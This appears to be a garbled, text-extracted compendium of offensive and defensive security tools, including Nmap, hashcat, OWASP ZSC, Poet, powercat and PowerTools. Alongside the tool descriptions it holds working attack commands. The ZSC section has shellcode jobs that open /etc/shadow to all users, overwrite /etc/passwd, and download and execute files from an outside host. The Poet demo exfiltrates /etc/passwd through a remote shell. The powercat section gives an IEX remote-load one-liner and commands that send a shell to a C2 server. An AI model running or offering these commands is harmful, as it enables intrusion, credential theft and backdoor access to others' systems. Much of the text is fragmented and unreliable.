NMAP 7 - SECURITY SCANNER FOR NETWORK
EXPLORATION & SECURITY AUDITS
Before we get into the detailed changes, here are the top 7
improvements in Nmap 7:
1. Major Nmap Scripting Engine (NSE) Expansion
As the Nmap core has matured, more and more new
functionality is developed as part of our NSE subsystem
instead. In fact, we've added 171 new scripts and 20 libraries
since Nmap 6. Exmaples include firewall-bypass, supermicroipmi-conf, oracle-brute-stealth, and ssl-heartbleed. And NSE is
now powerful enough that scripts can take on core functions
Download Nmap 7
NOPO - NOSQL HONEYPOT FRAMEWORK
NoPo works out of the box with Python version 2.6.x and 2.7.x
on any platform.
Added Features:
Usage
Download NoPo
NORIBEN - YOUR PERSONAL, PORTABLE MALWARE
SANDBOX
Cool Features
If you have a folder of YARA signature files, you can specify it
with the --yara option. Every new file create will be scanned
against these signatures with the results displayed in the output
results.
If you have a VirusTotal API, place it into a file named
"virustotal.api" (or embed directly in the script) to auto-submit
MD5 file hashes to VT to get the number of viral results.
You can add lists of MD5s to auto-ignore (such as all of your
system files). Use md5deep and throw them into a text file, use
--hash to read them.
You can automate the script for sandbox-usage. Using -t to
automate execution time, and --cmd "path\exe" to specify a
malware file, you can automatically run malware, copy the
results off, and then revert to run a new sample.
The --generalize feature will automatically substitute absolute
paths with Windows environment paths for better IOC
@bbaskin
]===--
usage: Noriben.py [-h] [-c CSV] [-p PML] [-f FILTER] [-hash HASH]
[-t TIMEOUT] [--output OUTPUT] [--yara
YARA] [--generalize]
[--cmd CMD] [-d]
optional arguments:
-h, --help
CSV file
-p PML, --pml PML
PML file
-f FILTER, --filter FILTER
Specify alternate Procmon Filter
PMC
--hash HASH
--yara YARA
--generalize
environment variables.
Default: True
--cmd CMD
quotes)
-d
Download Noriben
NSEARCH - NMAP SCRIPT ENGINE SEARCH
NSEarch is a tool that helps you find scripts that are used nmap
(NSE) , can be searched using the name or category , it is also
possible to see the documentation of the scripts found.
USAGE:
$ python nsearch.py
Main Menu
Initial Setup
================================================
_
_____
| \ | |/
|
_____
___||
___|
\| |\ `--. | |__
| . ` | `--. \|
| |\
| |
__ _
__|
_ __
___ | |__
\__,_||_|
| (__ | | | |
\___||_| |_|
================================================
Version 0.3
@jjtibaquira
================================================
Creating Database :nmap_scripts.sqlite3
Creating Table For Script ....
Creating Table for Categories ....
Creating Table for Scripts per Category ....
Upload Categories to Categories Table ...
Main Console
================================================
_
_____
| \ | |/
|
_____
___||
___|
\| |\ `--. | |__
| . ` | `--. \|
| |\
__|
| |
__ _
_ __
___ | |__
\__,_||_|
| (__ | | | |
\___||_| |_|
================================================
Version 0.3
@jjtibaquira
================================================
nsearch>
Basic Commands
================================================
_
_____
| \ | |/
|
_____
___||
___|
\| |\ `--. | |__
| . ` | `--. \|
| |\
| |
__ _
__|
_ __
___ | |__
| (__ | | | |
\__,_||_|
\___||_| |_|
================================================
Version 0.3
@jjtibaquira
================================================
nsearch> help
Nsearch Commands
================
clear
doc
exit
help
history
last
search
nsearch>
================================================
_
_____
| \ | |/
|
_____
___||
___|
\| |\ `--. | |__
| . ` | `--. \|
| |\
__|
| |
__ _
_ __
___ | |__
\__,_||_|
| (__ | | | |
\___||_| |_|
================================================
Version 0.3
@jjtibaquira
================================================
_____
| \ | |/
|
_____
___||
___|
| |
\| |\ `--. | |__
| . ` | `--. \|
| |\
__ _
__|
_ __
___ | |__
\__,_||_|
| (__ | | | |
\___||_| |_|
================================================
Version 0.3
@jjtibaquira
================================================
nsearch> search name:ssh
1.ssh-hostkey.nse
2.ssh2-enum-algos.nse
3.sshv1.nse
nsearch>
================================================
_
| \ | |/
|
_____
___||
_____
___|
\| |\ `--. | |__
| |
__ _
_ __
___ | |__
| . ` | `--. \|
| |\
__|
\__,_||_|
| (__ | | | |
\___||_| |_|
================================================
Version 0.3
@jjtibaquira
================================================
nsearch> doc ssh <TAB>
ssh-hostkey.nse
ssh2-enum-algos.nse
sshv1.nse
DownloadNSEarch
OCLHASHCAT V2.01 - WORLDS FASTEST PASSWORD
CRACKER
oclHashcat is the world's fastest and most advanced GPGPUbased password recovery utility, supporting five unique modes
of attack for over 170 highly-optimized hashing algorithms.
oclHashcat currently supports AMD (OpenCL) and Nvidia
(CUDA) graphics processors on GNU/Linux and Windows
7/8/10, and has facilities to help enable distributed password
cracking.
FEATURES
ATTACK-MODES
Straight *
Combination
Brute-force
Hybrid dict + mask
Hybrid mask + dict
* accept Rules
ALGORITHMS
MD4
MD5
Half MD5 (left, mid, right)
SHA1
SHA-256
SHA-384
SHA-512
SHA-3 (Keccak)
SipHash
RipeMD160
Whirlpool
GOST R 34.11-94
GOST R 34.11-2012 (Streebog) 256-bit
GOST R 34.11-2012 (Streebog) 512-bit
Double MD5
Double SHA1
md5($pass.$salt)
md5($salt.$pass)
md5(unicode($pass).$salt)
md5($salt.unicode($pass))
md5(sha1($pass))
md5($salt.md5($pass))
md5($salt.$pass.$salt)
md5(strtoupper(md5($pass)))
sha1($pass.$salt)
sha1($salt.$pass)
sha1(unicode($pass).$salt)
sha1($salt.unicode($pass))
sha1(md5($pass))
sha1($salt.$pass.$salt)
sha256($pass.$salt)
sha256($salt.$pass)
sha256(unicode($pass).$salt)
sha256($salt.unicode($pass))
sha512($pass.$salt)
sha512($salt.$pass)
sha512(unicode($pass).$salt)
sha512($salt.unicode($pass))
HMAC-MD5 (key = $pass)
HMAC-MD5 (key = $salt)
HMAC-SHA1 (key = $pass)
HMAC-SHA1 (key = $salt)
HMAC-SHA256 (key = $pass)
HMAC-SHA256 (key = $salt)
HMAC-SHA512 (key = $pass)
HMAC-SHA512 (key = $salt)
PBKDF2-HMAC-MD5
PBKDF2-HMAC-SHA1
PBKDF2-HMAC-SHA256
PBKDF2-HMAC-SHA512
MyBB
phpBB3
SMF
vBulletin
IPB
Woltlab Burning Board
osCommerce
xt:Commerce
PrestaShop
Mediawiki B type
Wordpress
Drupal
Joomla
PHPS
Django (SHA-1)
Django (PBKDF2-SHA256)
EPiServer
ColdFusion 10+
Apache MD5-APR
MySQL
PostgreSQL
MSSQL
Oracle H: Type (Oracle 7+)
Oracle S: Type (Oracle 11+)
Oracle T: Type (Oracle 12+)
Sybase
hMailServer
DNSSEC (NSEC3)
IKE-PSK
IPMI2 RAKP
iSCSI CHAP
Cram MD5
MySQL Challenge-Response Authentication (SHA1)
PostgreSQL Challenge-Response Authentication (MD5)
SIP Digest Authentication (MD5)
WPA
WPA2
NetNTLMv1
NetNTLMv1 + ESS
NetNTLMv2
Kerberos 5 AS-REQ Pre-Auth etype 23
Netscape LDAP SHA/SSHA
LM
NTLM
Domain Cached Credentials (DCC), MS Cache
Domain Cached Credentials 2 (DCC2), MS Cache 2
MS-AzureSync PBKDF2-HMAC-SHA256
descrypt
bsdicrypt
md5crypt
sha256crypt
sha512crypt
bcrypt
scrypt
OSX v10.4
OSX v10.5
OSX v10.6
OSX v10.7
OSX v10.8
OSX v10.9
OSX v10.10
AIX {smd5}
AIX {ssha1}
AIX {ssha256}
AIX {ssha512}
Cisco-ASA
Cisco-PIX
Cisco-IOS
Cisco $8$
Cisco $9$
Juniper IVE
Juniper Netscreen/SSG (ScreenOS)
Android PIN
GRUB 2
CRC32
RACF
Radmin2
Redmine
Citrix Netscaler
SAP CODVN B (BCODE)
SAP CODVN F/G (PASSCODE)
SAP CODVN H (PWDSALTEDHASH) iSSHA-1
PeopleSoft
Skype
7-Zip
RAR3-hp
PDF 1.1 - 1.3 (Acrobat 2 - 4)
PDF 1.4 - 1.6 (Acrobat 5 - 8)
PDF 1.7 Level 3 (Acrobat 9)
PDF 1.7 Level 8 (Acrobat 10 - 11)
MS Office <= 2003 MD5
DownloadoclHashcat v2.01
OPENVAS - THE WORLD'S MOST ADVANCED OPEN
SOURCE VULNERABILITY SCANNER AND MANAGER
OpenVAS Scanner
...
OpenVAS Manager
Scheduled scans
User Management
Feed synchronisation
...
Multi-language support
...
OpenVAS CLI
...
Download OpenVAS
OWASP ZAP 2.4.0 - PENETRATION TESTING TOOL FOR
TESTING WEB APPLICATIONS
An error occurred.
Try watching this video on www.youtube.com, or enable JavaScript if it is
disabled in your browser.
By default only the essential tabs are now shown when ZAP
starts up.
The remaining tabs are revealed when they are used (e.g. for
the spider and active scanner) or when you display them via
the special tab on the far right of each window with the green '+'
icon. This special tab disappears if there are no hidden tabs.
Tabs can be closed via a small 'x' icon which is shown when
Release 2.4.1
Bug fixes:
Issue
444
:
Guaranteed
NPE
on
AliasCertificate.getName() if getCN()==null
Issue 1442 : Up/Down arrow keys in results stop working if
"reflected"
Issue 1473 : Spider does not handle URLs extracted from
meta tags correctly
Issue 1497 : The spider is extracting and reporting links
from comments - event when instructed not to do so
Issue 1598 : startup script lacks support for FreeBSD
Issue 1615 : Search "All" option not working
Issue 1617 : ZAP 2.4.0 throws HeadlessExceptions when
running in daemon mode on headless machine
Issue 1618 : Target Technology Not Honored
Issue 1619 : Search regex might not be validated
Issue 1624 : Error while loading ZAP 2.4.0
Issue 1626 : Structural parameters not saved when
context exported and not available via the API
Issue 1636 : Users (for auth) & Forced User not loaded
from session
Issue 1647 : Wrong reference in Zest Result
Issue 1674 : Ajax spider not considering get parameters
Issue 1677 : Fuzzers can't be expanded on OS X
Issue 1694 : "Error: setting file is missing. Program will
exit." even if file exists
Issue 1698 : Escape API exceptions
Issue 1700 : Forced Browse Lists Missing from DropDown in 2.4.0
Usage of shellcodes
Shellcodesare small codes in assembly which could be use as
the payload in software exploiting. Other usages are in
malwares, bypassing antiviruses, obfuscated codes and etc.
Why use OWASP ZSC?
With these switch you can see the oslist,encode types and
functions [joblist] to generate your shellcode.
OS List "-oslist"
[+] linux_x86
[+] linux_x64
[+] linux_arm
[+] linux_mips
[+] freebsd_x86
[+] freebsd_x64
[+] windows_x86
[+] windows_x64
[+] osx
[+] solaris_x86
[+] solaris_x64
Functions "-joblist"
[+] exec('/path/file')
[+] chmod('/path/file','permission number')
[+] write('/path/file','text to write')
[+] file_create('/path/file','text to write')
[+] dir_create('/path/folder')
[+] download('url','filename')
[+] download_execute('url','filename','command to
execute')
[+] system('command to execute')
[+] script_executor('name of script','path and name of
shadow','777')" -o file.txt
>zsc -os linux_x86 -encode xor_random -job "chmod('/etc/
passwd','444')" -o file.txt
>zsc -os linux_x86 -encode xor_0x41414141 -job "chmod('/
etc/shadow','777')" -o file.txt
>zsc -os linux_x86 -encode xor_0x45872f4d -job "chmod('/
etc/passwd','444')" -o file.txt
>zsc -os linux_x86 -encode add_random -job "chmod('/etc/
passwd','444')" -o file.txt
>zsc -os linux_x86 -encode add_0x41414141 -job "chmod('/
etc/passwd','777')" -o file.txt
>zsc -os linux_x86 -encode sub_random -job "chmod('/etc/
passwd','777')" -o file.txt
>zsc -os linux_x86 -encode sub_0x41414141 -job "chmod('/
etc/passwd','444')" -o file.txt
>zsc -os linux_x86 -encode none -job "file_create('/root/
Desktop/hello.txt','hello')" -o file.txt
>zsc -os linux_x86 -encode none -job "file_create('/root/
Desktop/hello2.txt','hello[space]world[space]!')" -o
file.txt
>zsc -os linux_x86 -encode none -job "dir_create('/root/
Desktop/mydirectory')" -o file.txt
>zsc -os linux_x86 -encode none -job "download('http://
www.z3r0d4y.com/exploit.type','myfile.type')" -o file.txt
>zsc -os linux_x86 -encode none -job
"download_execute('http://www.z3r0d4y.com/
exploit.type','myfile.type','./myfile.type')" -o file.txt
#multi command
>zsc -os linux_x86 -encode none -job
"download_execute('http://www.z3r0d4y.com/
exploit.type','myfile.type','chmod[space]777[space]myfile
.type;sh[space]myfile.type')" -o file.txt
>zsc -os linux_x86 -encode none -job
"script_executor('script.type','D:\\myfile.type','./
script.type')" -o file.txt
>zsc -os linux_x86 -encode none -job
"script_executor('z3r0d4y.sh','/root/
z3r0d4y.sh','sh[space]z3r0d4y.sh')" -o file.txt
>zsc -os linux_x86 -encode none -job
"script_executor('ali.py','/root/Desktop/
0day.py','chmod[space]+x[space]ali.py;
[space]python[space]ali.py')" -o file.txt
>zsc -os linux_x86 -encode none -job "system('ls')" -o
file.txt
>zsc -os linux_x86 -encode none -job "system('ls[space]la')" -o file.txt
>zsc -os linux_x86 -encode none -job "system('ls[space]la[space]/etc/shadow;chmod[space]777[space]/etc/
shadow;ls[space]-la[space]/etc/shadow;cat[space]/etc/
shadow;wget[space]file[space];chmod[space]777[space]file;
./file')" -o file.txt
>zsc -os linux_x86 -encode none -job
"system('wget[space]file;sh[space]file')" -o file.txt
>zsc -os linux_x86 -encode none -job "chmod('/etc/
shadow','777')" -o file.txt
>zsc -os linux_x86 -encode none -job "write('/etc/
passwd','user:pass')" -o file.txt
>zsc -os linux_x86 -encode none -job "exec('/bin/bash')"
-o file.txt
shellcode.
N
o
t
e
:
script_executor(),download_execute(),download(),dir_create(),fi
le_create() are using linux command line , not the function.
[wget,mkdir,echo] system() function added in script, you can
use it to do anything and generate any command line
shellcode.
Note: exec() doesnt support any ARGV same as exec(/bin/
bash -c ls) or exec(/bin/bash,-c,ls), you have to wait for next
version and this feature will available in system()
Note: you also can use high value for inc and dec time, like
inc_100000, your shellcode may get too big
Note: each time you execute chmod()[or any other] function
with random encode, you are gonna get random outputs and
different shellcode.
Note: your xor value could be anything. xor_0x41414141 and
xor_0x45872f4d are examples.
Wizard Switch
With -wizard switch you are able to generate shellcode without
long ARGVs, software will ask you for information.
Note: While you are using -wizard switch, if you push Enter
without typing anything, the default value will be set on the
varible.
Note: With entering list, List of values will be shown.
Available Features
[linux_x86]
add mix_all encoding in dir_create() [linux_x86]
add xor_random encoding in download() [linux_x86]
add xor_yourvalue encoding in download() [linux_x86]
add add_random encoding in download() [linux_x86]
add add_yourvalue encoding in download() [linux_x86]
add sub_random encoding in download() [linux_x86
add sub_yourvalue encoding in download() [linux_x86]
add inc encoding in download() [linux_x86]
add inc_timesyouwant encoding in download() [linux_x86
add dec encoding in download() [linux_x86]
add dec_timesyouwant encoding in download() [linux_x86]
add mix_all encoding in download() [linux_x86]
add xor_random encoding in download_execute()
[linux_x86]
add xor_yourvalue encoding in download_execute()
[linux_x86]
add add_random encoding in download_execute()
[linux_x86]
add add_yourvalue encoding in download_execute()
[linux_x86]
add sub_random encoding in download_execute()
[linux_x86
add sub_yourvalue encoding in download_execute()
[linux_x86]
add inc encoding in download_execute() [linux_x86]
add inc_timesyouwant encoding in download_execute()
[linux_x86
add dec encoding in download_execute() [linux_x86]
add dec_timesyouwant encoding in download_execute()
[linux_x86]
add mix_all encoding in download_execute() [linux_x86]
add xor_random encoding in system() [linux_x86]
add xor_yourvalue encoding in system() [linux_x86]
add add_random encoding in system() [linux_x86]
add add_yourvalue encoding in system() [linux_x86]
DownloadOWASP ZSC
PACKET SENDER - THE UDP AND TCP NETWORK TEST
UTILITY
Change log
Version 2015-04-19
Portable mode
Read in file from command line
Save traffic log
Mobile versions have been abandoned. Project focus
is now on the far more popular desktop version.
Version 2015-02-13
Migrated to GitHub
New vector-based logo
Bug fix in quick-disable/enable
Migrated to Qt 5.4
Ubuntu version brought up to date.
Forums are closed (spammers killed it).
Version 2014-10-07
Initial launch of forums.
Multi-Send.
Quick-send from traffic log selected packets.
Packet Export/Import.
Rolling traffic log support.
Numerous configuration settings added:
Copy raw packet data to clipboard.
Receive before send.
Connection delays for slow devices.
Command line interface default binds to 0.
Universal (XP through 8.1) Windows installer.
Migrated to Qt 5.3
Some rework of the "About" section.
Version 2014-02-22
TCP connections are now fully threaded (no more UI
freezes).
Brand new and highly capable command line
interface. (Run PacketSender --help)
Some mild UI enhancements to make sending
easier.
DownloadPacket Sender
DownloadPackETH
PASSGEN - RANDOM CHARACTER GENERATOR CRUNCH
TO CRACK WPA/WPA2
-U uppercase ascii
-U1 uppercase ascii + digits
-lU lowercase + uppercase ascii
-lU1 lowercase + uppercase ascii + digits
-C [char] [length] custom character set + length
Download Passgen
PASSWORD CRACKING SUITE
Dics Path:
In this path, you can add any dictionary you would like to use.
Tools Path:
In this path, the script will install 3rd party tools. You can
download some here:
http://www.moehre.org/bruteforce.html
http://cyberwarzone.com/cyberwarfare/password-crackingmega-collection-password-cracking-word-lists
http://www.packetstormsecurity.org/Crackers/wordlists/
http://www.theargon.com/achilles/wordlists/
http://www.openwall.com/wordlists/
http://www.outpost9.com/files/WordLists.html
FTP
POP3
IMAP
SMTP
Options
--json
Output in json
--import
--export
--dir-import
Import directory
--dir-export
Export directory
Debug directory
--dir-tls
TLS directory
--strings
--sections
Sections information
--dump
Install
Prerequisites
Python 2.6.5 -> 2.7.x
Install
from pypi
# pip install https://github.com/guelfoweb/peframe/
archive/master.zip
from git
$ git clone https://github.com/guelfoweb/peframe.git
$ cd peframe
# python setup.py install
Example
$ peframe malware.exe
Short information
-----------------------------------------------------------
File Name
malware.exe
File Size
935281 byte
Compile Time
2012-01-29 22:32:28
DLL
False
Sections
Hash MD5
cae18bdb8e9ef082816615e033d2d85b
Hash SAH1
546060ad10a766e0ecce1feb613766a340e875c0
Imphash
353cf96592db561b5ab4e408464ac6ae
Detected
Directory
Security
XOR discovered
----------------------------------------------------------Key length
Offset (hex)
Offset (dec)
0x5df4e
384846
0x5df4e
384846
0x5df4e
384846
0x5df4e
384846
Digital Signature
----------------------------------------------------------Virtual Address
12A200
Block Size
4813 byte
Hash MD5
63b8c4daec26c6c074ca5977f067c21e
Hash SHA-1
53731a283d0c251f7c06f6d7d423124689873c62
Packer
Packer
Packer
FindWindowExW
Anti Debug
FindWindowW
Anti Debug
GetWindowThreadProcessId
Anti Debug
IsDebuggerPresent
Anti Debug
OutputDebugStringW
Anti Debug
Process32FirstW
Anti Debug
Process32NextW
Anti Debug
TerminateProcess
Anti Debug
UnhandledExceptionFilter
Virtual Box
Trick
VMware trick
--Function
CreateDirectoryA
Function
CreateFileA
Function
CreateFileMappingA
Function
CreateToolhelp32Snapshot
Function
DeleteFileA
Function
FindFirstFileA
Function
FindNextFileA
Function
GetCurrentProcess
Function
GetFileAttributesA
Function
GetFileSize
Function
GetModuleHandleA
Function
GetProcAddress
Function
GetTempPathA
Function
GetTickCount
Function
GetUserNameA
Function
GetVersionExA
Function
InternetCrackUrlA
Function
LoadLibraryA
Function
MapViewOfFile
Function
OpenProcess
Function
Process32First
Function
Process32Next
Function
RegCloseKey
Function
RegCreateKeyA
Function
RegEnumKeyExA
Function
RegOpenKeyA
Function
RegOpenKeyExA
Function
Sleep
Function
WSAStartup
Function
WriteFile
Function
closesocket
Function
connect
Function
recv
Function
send
Function
socket
.data
Hash MD5
b896a2c4b2be73b89e96823c1ed68f9c
Hash SHA-1
523d58892f0375c77e5e1b6f462005ae06cdd0d8
Section
.rdata
Hash MD5
41795b402636cb13e2dbbbec031dbb1a
Hash SHA-1
b674141b34f843d54865a399edfca44c3757df59
File name discovered [43]
----------------------------------------------------------Binary
wiseftpsrvs.bin
Data
ESTdb2.dat
Data
Favorites.dat
Data
History.dat
Data
bookmark.dat
Data
fireFTPsites.dat
Data
quick.dat
Data
site.dat
Data
sites.dat
Database
FTPList.db
Database
sites.db
Database
NovaFTP.db
Executable
unleap.exe
Executable
explorer.exe
FTP Config
FTPVoyager.ftp
Library
crypt32.dll
Library
kernel32.dll
Library
mozsqlite3.dll
Library
userenv.dll
Library
wand.dat
Library
wininet.dll
Library
wsock32.dll
Text
Connections.txt
Text
ftplist.txt
Text
signons.txt
Text
signons2.txt
Text
signons3.txt
RhinoSoft.com
Url
http://0uk.net/zaaqw/gate.php
AutoIt v3 Script
FileVersion
3, 3, 8, 1
FileDescription
Translation
0x0809 0x04b0
DownloadPEframe
PEINJECTOR - MITM PE FILE INFECTOR
DownloadPEInjector
PEMCRACKER - TOOL TO CRACK ENCRYPTED PEM
FILES
Usage Example
bwall@ragnarok:~/data/publicprojects/pemcracker$ ./
pemcracker test.pem test.dict
Password is komodia for test.pem
Compiling
make
Download Pemcracker
PENTESTBOX - PORTABLE PENETRATION TESTING
DISTRIBUTION FOR WINDOWS ENVIRONMENTS
PentestBox Demo
from Pentest Box
Tools category
DownloadPentestBox
PENTESTPACKAGE - A PACKAGE OF MULTIPLE
PENTEST SCRIPTS
CONTENTS:
Download PentestPackage
PENTOO 2015 - SECURITY-FOCUSED LIVECD BASED ON
GENTOO
Current Features :
Changes saving (including unetbooting support)
CUDA/OpenCL Enhanced cracking software
Kernel 4.0.8 and all needed patches for injection
XFCE 4.12
Please see blog for full release notes including known
bootloader issues with some versions of unetbootin
Full tools list.
DownloadPentoo 2015
PHAN - STATIC ANALYZER FOR PHP
Getting it running
Phan requires PHP 7+ with the php-ast extension loaded. The
code you analyze can be written for any version of PHP.
To get phan running;
1. Clone the repo
2. Run composer install to load dependencies
3. Run ./test to run the test suite
4. Test phan on itself by running the following
./phan `find src/ -type f -path '*.php'`
phpize
./configure
make install
or give it a text file containing a list of files (but see the next
section) to scan:
phan -f filelist.txt
class lang_installer
test2.php:4 TypeError arg#1(arg) is object but
escapeshellarg() takes string
test2.php:4 TypeError arg#1(msg) is int but logmsg()
takes string defined at sth.php:5
test2.php:4 TypeError arg#2(level) is string but logmsg()
takes int defined at sth.php:5
test3.php:11 TypeError arg#1(number) is string but
number_format() takes float
test3.php:12 TypeError arg#1(string) is int but
htmlspecialchars() takes string
test3.php:13 TypeError arg#1(str) is int but md5() takes
string
test3.php:14 TypeError arg#1(separator) is int but
explode() takes string
test3.php:14 TypeError arg#2(str) is int but explode()
takes string
You can see the full list of command line options by running
phan -h .
Generating a file list
This static analyzer does not track includes or try to figure out
autoloader magic. It treats all the files you throw at it as one big
application. For code encapsulated in classes this works well.
For code running in the global scope it gets a bit tricky because
order matters. If you have an index.php including a file that
sets a bunch of global variables and you then try to access
those after the include in index.php the static analyzer won't
know anything about these.
In practical terms this simply means that you should put your
entry points and any files setting things in the global scope at
the top of your file list. If you have aconfig.php that sets
global variables that everything else needs put that first in the
list followed by your various entry points, then all your library
files containing your classes.
Bugs
When you find an issue, please take the time to create a tiny
reproducing code snippet that illustrates the bug. And once you
have done that, fix it. Then turn your code snippet into a test
and add it to tests then ./test and send a PR with your fix
and test. Alternatively, you can open an Issue with details.
More on phpdoc types
All the phpdoc types listed on that page should work with one
exception. It says that (int|string)[] would indicate an array
of ints or strings. phan doesn't support a mixed-type constraint
like that. You can say int[]|string[] meaning that the array
has to contain either all ints or all strings, but if you have mixed
types, just use array .
That means you can do:
<?php
/**
* MyFunc
* @param int
$arg1
* @param int|string
$arg2
* @param int[]|int
$arg3
checks the first 5 elements. If the first 5 are of the same type, it
assumes the rest are as well. If it can't determine the array subtype it just becomes array which will pass through most type
checks. In practical terms, this means that [1,2,'a'] is seen
as array but [1,2,3] is int[] and ['a','b','c'] as
string[] .
Dealing with dynamic code that confuses the analyzer
There are times when there is just no way for the analyzer to
get things right. For example:
<?php
function test() {
$var = 0;
$var = call_some_func_you_cant_hint();
if(is_string($var)) {
$pos = strpos($var, '|');
}
}
This tells the analyzer that along with the int that it figures out
on its own, $var can also be a string or an array inside that
One of the big changes in PHP 7 is the fact that the parser now
uses a real Abstract Syntax Tree ( AST ). This makes it much
easier to write code analysis tools by pulling the tree and
walking it looking for interesting things.
Phan has 2 passes. On the first pass it reads every file, gets
the AST and recursively parses it looking only for functions,
methods and classes in order to populate a bunch of global
hashes which will hold all of them. It also loads up definitions
for all internal functions and classes. The type info for these
come from a big file called FunctionSignatureMap.
The real complexity hits you hard in the second pass. Here
some things are done recursively depth-first and others not. For
example, we catch something likeforeach($arr as $k=>$v)
because we need to tell the foreach code block that $k and $v
exist. For other things we need to recurse as deeply as
possible into the tree before unrolling our way back out. For
example, for something like c(b(a(1))) we need to call a(1)
and check that a()actually takes an int, then get the return type
and pass it to b() and check that, before doing the same to
c() .
There is a Scope object which keeps track of all variables. It
mimics PHP's scope handling in that it has a globals along with
entries for each function, method and closure. This is used to
detect undefined variables and also type-checked on a return
$var .
Quick Mode Explained
Running tests
vendor/bin/phpunit
Download Phan
PHEMAIL - AUTOMATE SENDING PHISHING EMAILS
<body>]
-e
(Default: emails.txt)
-f
Newsletter)
-b
-p
body.txt)
searched (Default: 10 pages)
-v
-l
-B
-m
-g
pictures
to
username:password
-t
(Default: 3 sec)
-R
-L
emails)
webserver log file (Default: Date time in format "%d_%m_
%Y_%H_%M")
-S
-d
-n
(Default: 10 emails)
-c
-w
-o
-F
points to
0- firstname surname
1- firstname.surname@example.com
2- firstnamesurname@example.com
3- f.surname@example.com
4- firstname.s@example.com
5- surname.firstname@example.com
6- s.firstname@example.com
7- surname.f@example.com
8- surnamefirstname@example.com
9- firstname_surname@example.com
Examples: phemail.py -e emails.txt -f "Name Surname
<name_surname@example.com>" -r "Name Surname
<name_surname@example.com>" -s "Subject" -b body.txt
phemail.py -S example -d example.com -F 1 -p 12
phemail.py -c https://example.com
Disclaimer
Download PhEmail
PIXIEWPS - BRUTEFORCE OFFLINE THE WPS PIN (PIXIE
DUST ATTACK)
INSTALLATION
USAGE
Usage: pixiewps <arguments>
Required Arguments:
-e, --pke
-r, --pkr
-s, --e-hash1
: Enrollee Hash1
-z, --e-hash2
: Enrollee Hash2
-a, --authkey
Optional Arguments:
-n, --e-nonce
: Enrollee nonce
-m, --r-nonce
: Registrar nonce
-b, --e-bssid
: Enrollee BSSID
-S, --dh-small
not needed)
[No]
-f, --force
[No]
-v, --verbosity
quietest
-h, --help
USAGE EXAMPLE
DownloadPixiewps
PLECOST - WORDPRESS VULNERABILITIES FINDER
This Plecost 3 version, add a lot of new features and fixes, like:
Fixed a lot of bugs.
XML
$ plecost -v http://SITE.com -o results.xml
Or...
$ plecost -c 10 http://SITE.com
Updating
ScreenShots
DownloadPlecost
POET - A SIMPLE POST-EXPLOITATION TOOL
$ cd poet
$ make
Poet is super easy to use, and requires nothing more than the
Python (2.7) standard library. To easily try it out, a typical
invocation would look like:
Terminal 1:
$ ./poet-client -v 127.0.0.1 1
Terminal 2:
$ sudo ./poet-server
server
INTERVAL
(s)
optional arguments:
-h, --help
$ ./poet-server -h
usage: poet-server [-h] [-p PORT]
optional arguments:
-h, --help
Demo
# ./poet-server
_
____
____
___
/ /_
/ __ \/ __ \/ _ \/ __/
/ /_/ / /_/ /
__/ /
/ .___/\____/\___/\__/
/_/
[+] Poet server started on 443.
[+] (2015-03-27 03:40:42.272601) Connected By:
('5.4.3.2', 59309) -> VALID
[+] (2015-03-27 03:40:42.273087) Entering control shell
Welcome to psh, the Poet shell!
Running `help' will give you a list of supported
commands.
psh > shell
psh > user@server $ uname -a
Linux lolServer 3.8.0-29-generic #42~precise1-Ubuntu SMP
Wed May 07 16:19:23 UTC 2014 x86_64 x86_64 x86_64 GNU/
Linux
psh > user@server $ ^D
psh > exfil /etc/passwd
psh : exfil written to archive/20150327/exfil/
passwd-201503274054.txt
psh > help
Commands:
chint
dlexec
exec
exfil
exit
help
recon
selfdestruct
shell
psh > exit
[+] (2015-03-27 03:40:57.144083) Exiting control shell.
[-] (2015-03-27 03:40:57.144149) Poet server terminated.
DownloadPoet
PORTDOG - SIMPLE PYTHON SCRIPT TO DETECT PORT
SCANNING TECHNIQUES
Raw packets for analysis. For this reason, please ensure that
you have run this script from privileged session.
Usage:
sudo python portdog.py -t time_for_sniff_in_minutes
DownloadPortDog
PORTEXPERT - MONITORS ALL APPLICATIONS
CONNECTED TO THE INTERNET
HTTPS,...
Capability to show/hide system level processes
Capability to show/hide loopbacks
Time freeze function
DownloadPortExpert
POWERCAT - NETCAT: THE POWERSHELL VERSION
Installation
powercat is a powershell function. First you need to load the
function before you can execute it. You can put one of the
below commands into your powershell profile so powercat is
automatically loaded when powershell starts.
Load The Function From Downloaded .ps1 File:
. .\powercat.ps1
Load The Function From URL:
IEX (New-Object
System.Net.Webclient).DownloadString('https://
raw.githubusercontent.com/besimorhino/powercat/master/
powercat.ps1')
Parameters:
-l
[Switch]
-c
Connect to a listener.
[String]
-p
[String]
-e
Execute. (GAPING_SECURITY_HOLE)
[String]
-ep
Execute Powershell.
[Switch]
-r
10.1.1.1:443"
-u
[String]
[Switch]
-dns
[String]
-dnsft
[int32]
-t
[int32]
-i
[object]
-o
"String"
-of
[String]
-d
[Switch]
-rep
[Switch]
-g
Generate Payload.
[Switch]
-ge
[Switch]
-h
[Switch]
Basic Connections
File Transfer
Shells
powercat supports more than sending data over TCP. Specify u to enable UDP Mode. Data can also be sent to a dnscat2
server with -dns.
Send Data Over UDP:
powercat -c 10.1.1.1 -p 8000 -u
powercat -l -p 8000 -u
Connect to the c2.example.com dnscat2 server using the
DNS server on 10.1.1.1:
powercat -c 10.1.1.1 -p 53 -dns c2.example.com
Send a shell to the c2.example.com dnscat2 server using
the default DNS server in Windows:
powercat -dns c2.example.com -e cmd
Relays
Generate Payloads
Misc Usage
Download Powercat
POWERTOOLS - COLLECTION OF POWERSHELL
PROJECTS WITH A FOCUS ON OFFENSIVE OPERATIONS
PowerUp
PowerUp is a powershell tool to assist with local privilege
escalation on Windows systems. It contains several methods to
identify and abuse vulnerable services, as well as DLL hijacking
opportunities, vulnerable registry settings, vulnerable schtasks,
and more.
Service Enumeration:
Get-ServiceUnquoted
Get-ServiceFilePermission
returns services
modifies a modifiable
Service Abuse:
Invoke-ServiceUserAdd
execute an arbitrary
replaces a service
replaces a service
restores a replaced
starts a given
Invoke-ServiceStop
Invoke-ServiceEnable
enables a given
disables a given
returns detailed
service
service
Invoke-ServiceDisable
service
Get-ServiceDetail
DLL Hijacking:
Find-DLLHijack
writes out a
checks if the
Registry Checks:
Get-RegAlwaysInstallElevated
Misc.:
Get-VulnSchTask
finds remaining
PowerBreach
PowerBreach is a backdoor toolkit that aims to provide the user
a wide variety of methods to backdoor a system. It focuses on
diversifying the "trigger" methods which allows the user
flexibility on how to signal to the backdoor that it needs to
phone home. PowerBreach focuses on memory only methods
that do not persist across a reboot without further assistance
